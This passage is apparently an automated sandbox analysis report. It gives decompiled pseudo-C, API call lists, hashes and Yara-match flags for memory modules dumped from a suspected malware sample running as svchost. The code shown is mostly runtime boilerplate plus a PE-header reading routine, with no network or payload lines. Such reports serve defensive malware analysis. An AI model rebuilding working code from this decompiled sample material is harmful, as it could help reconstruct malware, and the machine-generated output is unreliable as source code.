                                                				EnterCriticalSection(0x6fd6ac7c);
                                                				_t20 =  *0x6fd6ac98; // 0x14
                                                				_t24 = 0;
                                                				if(_t20 == 0) {
                                                					L9:
                                                					 *0x6fd6ac98 = 0;
                                                					E6FD54C30();
                                                					LeaveCriticalSection(0x6fd6ac7c);
                                                					EnterCriticalSection(0x6fd6ac54);
                                                					_t21 =  *0x6fd6ac70; // 0x6
                                                					_t25 = 0;
                                                					if(_t21 == 0) {
                                                						L14:
                                                						 *0x6fd6ac70 = 0;
                                                						_t9 = E6FD54BC0();
                                                						LeaveCriticalSection(0x6fd6ac54);
                                                						return _t9;
                                                					}
                                                					if(0 >= _t21) {
                                                						L13:
                                                						_t25 = _t25 + 1;
                                                						if(_t25 < _t21) {
                                                							goto L11;
                                                						}
                                                						goto L14;
                                                					}
                                                					L11:
                                                					_t10 =  *0x6fd6ac6c; // 0x30300a8
                                                					_t22 =  *((intOrPtr*)(_t10 + _t25 * 4));
                                                					if(_t22 != 0) {
                                                						LocalFree( *(_t22 + 8));
                                                						_push(0xc);
                                                						E6FD559E2(_t22);
                                                						_t21 =  *0x6fd6ac70; // 0x6
                                                						_t26 = _t26 + 8;
                                                					}
                                                					goto L13;
                                                				}
                                                				if(0 >= _t20) {
                                                					L8:
                                                					_t24 = _t24 + 1;
                                                					if(_t24 < _t20) {
                                                						goto L2;
                                                					}
                                                					goto L9;
                                                				}
                                                				L2:
                                                				_t13 =  *0x6fd6ac94; // 0x304ebb8
                                                				_t23 =  *((intOrPtr*)(_t13 + _t24 * 4));
                                                				if(_t23 != 0) {
                                                					_t14 =  *(_t23 + 0x50);
                                                					if(_t14 != 0) {
                                                						LocalFree(_t14);
                                                					}
                                                					_t15 =  *(_t23 + 0x54);
                                                					if(_t15 != 0) {
                                                						LocalFree(_t15);
                                                					}
                                                					_push(0x58);
                                                					E6FD559E2(_t23);
                                                					_t20 =  *0x6fd6ac98; // 0x14
                                                					_t26 = _t26 + 8;
                                                				}
                                                				goto L8;
                                                			}


                                                APIs
                                                • EnterCriticalSection.KERNEL32(6FD6AC7C,73B76490,?,?,6FD548CB,?,6FD5546F), ref: 6FD547E8
                                                • LocalFree.KERNEL32(?,?,?,6FD548CB,?,6FD5546F), ref: 6FD54818
                                                • LocalFree.KERNEL32(?,?,?,6FD548CB,?,6FD5546F), ref: 6FD54822
                                                • LeaveCriticalSection.KERNEL32(6FD6AC7C,?,?,6FD548CB,?,6FD5546F), ref: 6FD5484E
                                                • EnterCriticalSection.KERNEL32(6FD6AC54,?,?,6FD548CB,?,6FD5546F), ref: 6FD54859
                                                • LocalFree.KERNEL32(?,?,?,6FD548CB,?,6FD5546F), ref: 6FD5487E
                                                • LeaveCriticalSection.KERNEL32(6FD6AC54,?,?,6FD548CB,?,6FD5546F), ref: 6FD548AA
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$FreeLocal$EnterLeave
                                                • String ID:
                                                • API String ID: 4044747872-0
                                                • Opcode ID: 51c49a4a2d5b0007ee179aa4f7e03fb0d228c30cfcf967c87231421ca1a86943
                                                • Instruction ID: 555f2aea32af65e921c1b21407d8b8ff8b2717b90340823fcce80620cede7a86
                                                • Opcode Fuzzy Hash: 51c49a4a2d5b0007ee179aa4f7e03fb0d228c30cfcf967c87231421ca1a86943
                                                • Instruction Fuzzy Hash: 9F11BB39500A61DBFF509F54C894ABD7B64BF46666F060019D89597240CF24F435D772
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0399255D
                                                • ___std_exception_copy.LIBVCRUNTIME ref: 039925CC
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 039925E4
                                                  • Part of subcall function 0399C8FB: RaiseException.KERNEL32(?,?,?,03998FCF,73B75870,73B76490,73BCF7E0,?,?,?,?,?,03998FCF,?,039BE8EC), ref: 0399C95A
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 039925EB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$ExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrow___std_exception_copy
                                                • String ID: bad locale name
                                                • API String ID: 2988018378-1405518554
                                                • Opcode ID: 1011b57f94f06df9da04fa7fbd1bb4ff17eb3a297b1ce1aeb0dfe160decf3219
                                                • Instruction ID: 49dddd1d2371f9564c6adef08cb1138ba3bbd5f02c1195a8b98470425c32ec5e
                                                • Opcode Fuzzy Hash: 1011b57f94f06df9da04fa7fbd1bb4ff17eb3a297b1ce1aeb0dfe160decf3219
                                                • Instruction Fuzzy Hash: 74217CB18147489EDB20CFA9C904BCFBBF8EF19714F004A5EE485A7741E775A6088BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6FD595EE,00000003,?,6FD5958E,00000003,6FD66A10,0000000C,6FD596D6,00000003,00000002), ref: 6FD5965D
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6FD59670
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,6FD595EE,00000003,?,6FD5958E,00000003,6FD66A10,0000000C,6FD596D6,00000003,00000002,00000000), ref: 6FD59693
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 73237deef8f5cced88e2969c3c3e1354c005015f5fd771fa416b0e87bb2ac136
                                                • Instruction ID: 60bbf3e59d929e53324deb59b2b206f284010b99e2038dcc5234bb8b310ea39a
                                                • Opcode Fuzzy Hash: 73237deef8f5cced88e2969c3c3e1354c005015f5fd771fa416b0e87bb2ac136
                                                • Instruction Fuzzy Hash: 1BF06275900608FBDF419FA0CC09BEEBFB4EF46B62F044169F805A2140CB35B964CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,039A25C3,00000003,?,039A2563,00000003,039BECD8,0000000C,039A26AB,00000003,00000002), ref: 039A2632
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 039A2645
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,039A25C3,00000003,?,039A2563,00000003,039BECD8,0000000C,039A26AB,00000003,00000002,00000000), ref: 039A2668
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 4e1908845f579fcfc778117ca69d94cb8fae63d1ab77a7b0bf854c59e386748a
                                                • Instruction ID: 0f748b50a54184bb90fd8601b0432ce38ef30d496824ab01b544f2c239913bb9
                                                • Opcode Fuzzy Hash: 4e1908845f579fcfc778117ca69d94cb8fae63d1ab77a7b0bf854c59e386748a
                                                • Instruction Fuzzy Hash: 02F0AF30A09608BFCF00EF96D909BAEBFB8EF48651F040169F805AA251EB318941DA90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E6FD58FB4(void* __ebx, void* __edx, void* __edi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				char _v16;
                                                				int _v20;
                                                				int _v24;
                                                				char* _v28;
                                                				int _v32;
                                                				char _v36;
                                                				intOrPtr _v44;
                                                				char _v48;
                                                				void* __esi;
                                                				signed int _t59;
                                                				char* _t61;
                                                				intOrPtr _t63;
                                                				int _t64;
                                                				intOrPtr* _t65;
                                                				signed int _t68;
                                                				intOrPtr* _t71;
                                                				short* _t73;
                                                				int _t74;
                                                				int _t76;
                                                				char _t78;
                                                				short* _t83;
                                                				short _t85;
                                                				int _t91;
                                                				int _t93;
                                                				char* _t98;
                                                				int _t103;
                                                				char* _t105;
                                                				void* _t106;
                                                				intOrPtr _t108;
                                                				intOrPtr _t109;
                                                				int _t110;
                                                				short* _t113;
                                                				int _t114;
                                                				int _t115;
                                                				signed int _t116;
                                                
                                                				_t106 = __edx;
                                                				_t59 =  *0x6fd68008; // 0xc92c5105
                                                				_v8 = _t59 ^ _t116;
                                                				_t61 = _a4;
                                                				_t91 = _a12;
                                                				_t115 = 0;
                                                				_v28 = _t61;
                                                				_v20 = 0;
                                                				_t113 = _a8;
                                                				_v24 = _t113;
                                                				if(_t61 == 0 || _t91 != 0) {
                                                					if(_t113 != 0) {
                                                						E6FD58DF3(_t91,  &_v48, _t106, _a16);
                                                						_t98 = _v28;
                                                						if(_t98 == 0) {
                                                							_t63 = _v44;
                                                							if( *((intOrPtr*)(_t63 + 0xa8)) != _t115) {
                                                								_t64 = WideCharToMultiByte( *(_t63 + 8), _t115, _t113, 0xffffffff, _t115, _t115, _t115,  &_v20);
                                                								if(_t64 == 0 || _v20 != _t115) {
                                                									L55:
                                                									_t65 = E6FD5A350();
                                                									_t114 = _t113 | 0xffffffff;
                                                									 *_t65 = 0x2a;
                                                									goto L56;
                                                								} else {
                                                									_t53 = _t64 - 1; // -1
                                                									_t114 = _t53;
                                                									L56:
                                                									if(_v36 != 0) {
                                                										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
                                                									}
                                                									goto L59;
                                                								}
                                                							}
                                                							_t68 =  *_t113 & 0x0000ffff;
                                                							if(_t68 == 0) {
                                                								L51:
                                                								_t114 = _t115;
                                                								goto L56;
                                                							}
                                                							while(_t68 <= 0xff) {
                                                								_t113 =  &(_t113[1]);
                                                								_t115 = _t115 + 1;
                                                								_t68 =  *_t113 & 0x0000ffff;
                                                								if(_t68 != 0) {
                                                									continue;
                                                								}
                                                								goto L51;
                                                							}
                                                							goto L55;
                                                						}
                                                						_t108 = _v44;
                                                						if( *((intOrPtr*)(_t108 + 0xa8)) != _t115) {
                                                							if( *((intOrPtr*)(_t108 + 4)) != 1) {
                                                								_t114 = WideCharToMultiByte( *(_t108 + 8), _t115, _t113, 0xffffffff, _t98, _t91, _t115,  &_v20);
                                                								if(_t114 == 0) {
                                                									if(_v20 != _t115 || GetLastError() != 0x7a) {
                                                										L45:
                                                										_t71 = E6FD5A350();
                                                										_t115 = _t115 | 0xffffffff;
                                                										 *_t71 = 0x2a;
                                                										goto L51;
                                                									} else {
                                                										if(_t91 == 0) {
                                                											goto L56;
                                                										}
                                                										_t73 = _v24;
                                                										while(1) {
                                                											_t109 = _v44;
                                                											_t103 =  *(_t109 + 4);
                                                											if(_t103 > 5) {
                                                												_t103 = 5;
                                                											}
                                                											_t74 = WideCharToMultiByte( *(_t109 + 8), _t115, _t73, 1,  &_v16, _t103, _t115,  &_v20);
                                                											_t93 = _a12;
                                                											_t110 = _t74;
                                                											if(_t110 == 0 || _v20 != _t115 || _t110 < 0 || _t110 > 5) {
                                                												goto L55;
                                                											}
                                                											if(_t110 + _t114 > _t93) {
                                                												goto L56;
                                                											}
                                                											_t76 = _t115;
                                                											_v32 = _t76;
                                                											if(_t110 <= 0) {
                                                												L43:
                                                												_t73 = _v24 + 2;
                                                												_v24 = _t73;
                                                												if(_t114 < _t93) {
                                                													continue;
                                                												}
                                                												goto L56;
                                                											}
                                                											_t105 = _v28;
                                                											while(1) {
                                                												_t78 =  *((intOrPtr*)(_t116 + _t76 - 0xc));
                                                												 *((char*)(_t105 + _t114)) = _t78;
                                                												if(_t78 == 0) {
                                                													goto L56;
                                                												}
                                                												_t76 = _v32 + 1;
                                                												_t114 = _t114 + 1;
                                                												_v32 = _t76;
                                                												if(_t76 < _t110) {
                                                													continue;
                                                												}
                                                												goto L43;
                                                											}
                                                											goto L56;
                                                										}
                                                										goto L55;
                                                									}
                                                								}
                                                								if(_v20 != _t115) {
                                                									goto L45;
                                                								}
                                                								_t28 = _t114 - 1; // -1
                                                								_t115 = _t28;
                                                								goto L51;
                                                							}
                                                							if(_t91 == 0) {
                                                								L21:
                                                								_t115 = WideCharToMultiByte( *(_t108 + 8), _t115, _t113, _t91, _t98, _t91, _t115,  &_v20);
                                                								if(_t115 == 0 || _v20 != 0) {
                                                									goto L45;
                                                								} else {
                                                									if(_v28[_t115 - 1] == 0) {
                                                										_t115 = _t115 - 1;
                                                									}
                                                									goto L51;
                                                								}
                                                							}
                                                							_t83 = _t113;
                                                							_v24 = _t91;
                                                							while( *_t83 != _t115) {
                                                								_t83 =  &(_t83[1]);
                                                								_t16 =  &_v24;
                                                								 *_t16 = _v24 - 1;
                                                								if( *_t16 != 0) {
                                                									continue;
                                                								}
                                                								break;
                                                							}
                                                							if(_v24 != _t115 &&  *_t83 == _t115) {
                                                								_t91 = (_t83 - _t113 >> 1) + 1;
                                                							}
                                                							goto L21;
                                                						}
                                                						if(_t91 == 0) {
                                                							goto L51;
                                                						}
                                                						while( *_t113 <= 0xff) {
                                                							_t98[_t115] =  *_t113;
                                                							_t85 =  *_t113;
                                                							_t113 =  &(_t113[1]);
                                                							if(_t85 == 0) {
                                                								goto L51;
                                                							}
                                                							_t115 = _t115 + 1;
                                                							if(_t115 < _t91) {
                                                								continue;
                                                							}
                                                							goto L51;
                                                						}
                                                						goto L45;
                                                					}
                                                					 *((intOrPtr*)(E6FD5A350())) = 0x16;
                                                					E6FD5A294();
                                                					goto L59;
                                                				} else {
                                                					L59:
                                                					return E6FD5599E(_v8 ^ _t116, _t115);
                                                				}
                                                			}


                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f0b2892b2aa6b1298853f2351f889b4c9006cb319cb5da5cbd881233a867b636
                                                • Instruction ID: 692836a2c4149090a8fbb9e241ac63d96ec1ed543e10dfb6385e72ddce0b4e2d
                                                • Opcode Fuzzy Hash: f0b2892b2aa6b1298853f2351f889b4c9006cb319cb5da5cbd881233a867b636
                                                • Instruction Fuzzy Hash: 4D71F7B1904326DBEF518F98CC44AEFBB75FF46320F14422AE86457188D770B861CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf00a4109b361b36d1075618d7917791101b32b54fdc2d96fc6d01fcae62f3d8
                                                • Instruction ID: 23e20f3fcaa68d657fb97a1256243833e41ddea816dc3f3b58107f16e6eecb2e
                                                • Opcode Fuzzy Hash: cf00a4109b361b36d1075618d7917791101b32b54fdc2d96fc6d01fcae62f3d8
                                                • Instruction Fuzzy Hash: DD71AC35904A1B9BDF20DB5DC884ABEFBBDFB462A4F184769E41957180DB708941C7E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$AllocateHeap
                                                • String ID:
                                                • API String ID: 3033488037-0
                                                • Opcode ID: 8c8b8bb29a40cce5c997c4d3edc082b739a4a5926a92751a214c15808cbd893d
                                                • Instruction ID: 1c734c9d78bd06729ddd84d5bb9f745acdd3c4af3be51858f7b98b5aea936253
                                                • Opcode Fuzzy Hash: 8c8b8bb29a40cce5c997c4d3edc082b739a4a5926a92751a214c15808cbd893d
                                                • Instruction Fuzzy Hash: 9C519335A04B04AFDB21DFEDD842A6AB7F9EF84760F184659E909DB250E731D901CBD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E6FD59B1D(signed int* __ecx, signed int __edx) {
                                                				signed int _v8;
                                                				intOrPtr* _v12;
                                                				signed int _v16;
                                                				signed int _t28;
                                                				signed int _t29;
                                                				intOrPtr _t33;
                                                				signed int _t37;
                                                				signed int _t38;
                                                				signed int _t40;
                                                				void* _t50;
                                                				signed int _t56;
                                                				intOrPtr* _t57;
                                                				signed int _t68;
                                                				signed int _t71;
                                                				signed int _t72;
                                                				signed int _t74;
                                                				signed int _t75;
                                                				signed int _t78;
                                                				signed int _t80;
                                                				signed int* _t81;
                                                				signed int _t85;
                                                				void* _t86;
                                                
                                                				_t72 = __edx;
                                                				_v12 = __ecx;
                                                				_t28 =  *__ecx;
                                                				_t81 =  *_t28;
                                                				if(_t81 != 0) {
                                                					_t29 =  *0x6fd68008; // 0xc92c5105
                                                					_t56 =  *_t81 ^ _t29;
                                                					_t78 = _t81[1] ^ _t29;
                                                					_t83 = _t81[2] ^ _t29;
                                                					asm("ror edi, cl");
                                                					asm("ror esi, cl");
                                                					asm("ror ebx, cl");
                                                					if(_t78 != _t83) {
                                                						L14:
                                                						 *_t78 = E6FD599DE( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                                                						_t33 = E6FD5864B(_t56);
                                                						_t57 = _v12;
                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E6FD5864B(_t78 + 4);
                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E6FD5864B(_t83);
                                                						_t37 = 0;
                                                						L15:
                                                						return _t37;
                                                					}
                                                					_t38 = 0x200;
                                                					_t85 = _t83 - _t56 >> 2;
                                                					if(_t85 <= 0x200) {
                                                						_t38 = _t85;
                                                					}
                                                					_t80 = _t38 + _t85;
                                                					if(_t80 == 0) {
                                                						_t80 = 0x20;
                                                					}
                                                					if(_t80 < _t85) {
                                                						L9:
                                                						_push(4);
                                                						_t80 = _t85 + 4;
                                                						_push(_t80);
                                                						_v8 = E6FD5BC9C(_t56);
                                                						_t40 = E6FD59FB4(0);
                                                						_t68 = _v8;
                                                						_t86 = _t86 + 0x10;
                                                						if(_t68 != 0) {
                                                							goto L11;
                                                						}
                                                						_t37 = _t40 | 0xffffffff;
                                                						goto L15;
                                                					} else {
                                                						_push(4);
                                                						_push(_t80);
                                                						_v8 = E6FD5BC9C(_t56);
                                                						E6FD59FB4(0);
                                                						_t68 = _v8;
                                                						_t86 = _t86 + 0x10;
                                                						if(_t68 != 0) {
                                                							L11:
                                                							_t56 = _t68;
                                                							_v8 = _t68 + _t85 * 4;
                                                							_t83 = _t68 + _t80 * 4;
                                                							_t78 = _v8;
                                                							_push(0x20);
                                                							asm("ror eax, cl");
                                                							_t71 = _t78;
                                                							_v16 = 0 ^  *0x6fd68008;
                                                							asm("sbb edx, edx");
                                                							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                                                							_v8 = _t74;
                                                							if(_t74 == 0) {
                                                								goto L14;
                                                							}
                                                							_t75 = _v16;
                                                							_t50 = 0;
                                                							do {
                                                								_t50 = _t50 + 1;
                                                								 *_t71 = _t75;
                                                								_t71 = _t71 + 4;
                                                							} while (_t50 != _v8);
                                                							goto L14;
                                                						}
                                                						goto L9;
                                                					}
                                                				}
                                                				return _t28 | 0xffffffff;
                                                			}


























                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: d475dfe90882afeb51e37ee0ec1fb00756cd7b4daef669e2c6d589908082484b
                                                • Instruction ID: 4ef25dea8936317e0adfee16eaed50700d32aca90520f3ee0153143035727fb8
                                                • Opcode Fuzzy Hash: d475dfe90882afeb51e37ee0ec1fb00756cd7b4daef669e2c6d589908082484b
                                                • Instruction Fuzzy Hash: 0141ADB2A00304DFEF10CFB8C980A6EB7B5EF85324F1546A9E515EB285DB31B911CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 3aa9c1b8c533b991c3f137ee3857d868a0494179ed31d7d3044b5632f6205efa
                                                • Instruction ID: a5a71e048cc00596bce8e953fae1918cf3842d41e9506e600b9a419e4a393234
                                                • Opcode Fuzzy Hash: 3aa9c1b8c533b991c3f137ee3857d868a0494179ed31d7d3044b5632f6205efa
                                                • Instruction Fuzzy Hash: EF417136A006049FDB24DF7CC880A6AB7E9EF89754F154AA9D955EF381D631A901CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 0399672B
                                                • IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 03996749
                                                • IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 0399675D
                                                • IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 0399677E
                                                • IsBadHugeReadPtr.KERNEL32(00000000,000000F8), ref: 039967A0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead
                                                • String ID:
                                                • API String ID: 2080902951-0
                                                • Opcode ID: 31c2a0b37314781ae78c86f758293f355ab14534baa41199d5e5e3c646ab0eb8
                                                • Instruction ID: 69742f97919a0f93e74a236e499f1d18c7b467f30afcc88cacef47f64a5f6acb
                                                • Opcode Fuzzy Hash: 31c2a0b37314781ae78c86f758293f355ab14534baa41199d5e5e3c646ab0eb8
                                                • Instruction Fuzzy Hash: A321D276241B156AFF30DA2C9DC0F6663FCEB41BF5F080567E9409B280FB65E8454AA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 039965B7
                                                • IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 039965D5
                                                • IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 039965E9
                                                • IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 0399660A
                                                • IsBadHugeReadPtr.KERNEL32(00000000,000000F8), ref: 0399662C
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead
                                                • String ID:
                                                • API String ID: 2080902951-0
                                                • Opcode ID: 869cb38e94b7a87263e3488adbe75c93e17769cd53525f196f093cecd0b5663a
                                                • Instruction ID: 1b23942b63d39ec999ed4cb856d46613b1d3fa943d745db62e8a00f6a638cbbb
                                                • Opcode Fuzzy Hash: 869cb38e94b7a87263e3488adbe75c93e17769cd53525f196f093cecd0b5663a
                                                • Instruction Fuzzy Hash: C111D6723416114AFF30F66E8C80B66E39DEF817F5F084477EA40D7588EF65E4518A64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E6FD54FD0(intOrPtr _a4, void** _a8, long* _a12) {
                                                				void* __edi;
                                                				signed int _t10;
                                                				long _t12;
                                                				void* _t13;
                                                				void** _t20;
                                                				intOrPtr _t23;
                                                				intOrPtr _t24;
                                                				intOrPtr* _t25;
                                                				intOrPtr _t26;
                                                
                                                				EnterCriticalSection(0x6fd6ac7c);
                                                				_t23 =  *0x6fd6ac98; // 0x14
                                                				_t10 = 0;
                                                				if(_t23 == 0) {
                                                					L6:
                                                					LeaveCriticalSection(0x6fd6ac7c);
                                                					return 0;
                                                				} else {
                                                					_t24 = _a4;
                                                					_t26 =  *0x6fd6ac94; // 0x304ebb8
                                                					while(1) {
                                                						_t25 = 0;
                                                						if(_t10 < _t23) {
                                                							_t25 =  *((intOrPtr*)(_t26 + _t10 * 4));
                                                						}
                                                						if( *_t25 == _t24) {
                                                							break;
                                                						}
                                                						_t10 = _t10 + 1;
                                                						if(_t10 < _t23) {
                                                							continue;
                                                						} else {
                                                							goto L6;
                                                						}
                                                						goto L12;
                                                					}
                                                					if( *((intOrPtr*)(_t25 + 0x50)) == 0) {
                                                						goto L6;
                                                					} else {
                                                						_t12 =  *(_t25 + 8);
                                                						if(_t12 <= 0) {
                                                							goto L6;
                                                						} else {
                                                							_t27 = _a12;
                                                							 *_a12 = _t12;
                                                							_t13 = LocalAlloc(0x40, _t12);
                                                							_t20 = _a8;
                                                							 *_t20 = _t13;
                                                							E6FD57920(_t25, _t13, 0,  *_t27);
                                                							if(E6FD51000( *_t20, _t27,  *((intOrPtr*)(_t25 + 0x50)),  *((intOrPtr*)(_t25 + 0xc))) == 0) {
                                                								LeaveCriticalSection(0x6fd6ac7c);
                                                								return 1;
                                                							} else {
                                                								LocalFree( *_t20);
                                                								LeaveCriticalSection(0x6fd6ac7c);
                                                								return 0;
                                                							}
                                                						}
                                                					}
                                                				}
                                                				L12:
                                                			}













                                                APIs
                                                • EnterCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD54FDA
                                                • LeaveCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD5500C
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 6FD55030
                                                • LocalFree.KERNEL32(?), ref: 6FD5505C
                                                • LeaveCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD55067
                                                • LeaveCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD5507B
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Leave$Local$AllocEnterFree
                                                • String ID:
